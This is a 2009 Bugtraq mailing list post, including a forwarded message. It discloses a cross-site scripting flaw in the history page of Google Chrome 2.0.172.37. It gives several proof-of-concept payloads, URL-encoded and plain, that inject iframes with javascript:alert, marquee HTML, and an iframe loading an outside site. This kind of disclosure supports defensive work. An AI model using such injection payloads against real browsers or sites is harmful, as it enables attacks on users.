| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 28 Jul 2009 17:01:02 +0530
From: Karn Ganeshen <karnganeshen@...il.com>
To: bugtraq@...urityfocus.com
Subject: Fwd: cross site scripting the browser google "chrome"
v2.0.172.37
chrome%3A%2F%2Fhistory%2F%23q%3D%22%3E%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%3B%22%3E%3C%2FIFRAME%3E
chrome%3A%2F%2Fhistory%2F%23q%3D%22%3E%3CFRAMESET%3E%3CFRAME%20SRC%3D%22javascript%3Aalert('XSS')%3B%22%3E%3C%2FFRAMESET%3E
Best Regards,
Karn Ganeshen
---------- Forwarded message ----------
From: biko linux <bikolinux@...il.com>
Date: Tue, Jul 28, 2009 at 1:03 AM
Subject: cross site scripting the browser google "chrome"
To: bugtraq@...urityfocus.com
autor : bikolinux
Vuln: cross site scripting the browser google "chrome"
Download: http://www.google.com/chrome
error local
EMAIL MSG@...OLINUX.NET bikolinux@...il.com
vercion test 2.0.172.37
#######################################################################################
cross site scripting the browser google "chrome"
The error is when making a request to record
#######################################################################################
path = chrome://history/
path = view-source:chrome://history/
The error is in the form
EXAMPLE
chrome://history/#q=%22%3E%3Cmarquee%3E%3Ch1%3Ebikolinux%3C%2Fh1%3E%3C%2Fmarquee%3E
view-source:chrome://history/#q="><marquee><h1>bikolinux</h1></marquee>
chrome://history/#q=%22'%3E%3Ciframe%20src%3D%22http%3A%2F%2Fmalandrines.Net%22%20height%3D%221024%22%20width%3D%22800%22%3E%3C%2Fiframe%3E
--
bikolinux allowed
Powered by blists - more mailing lists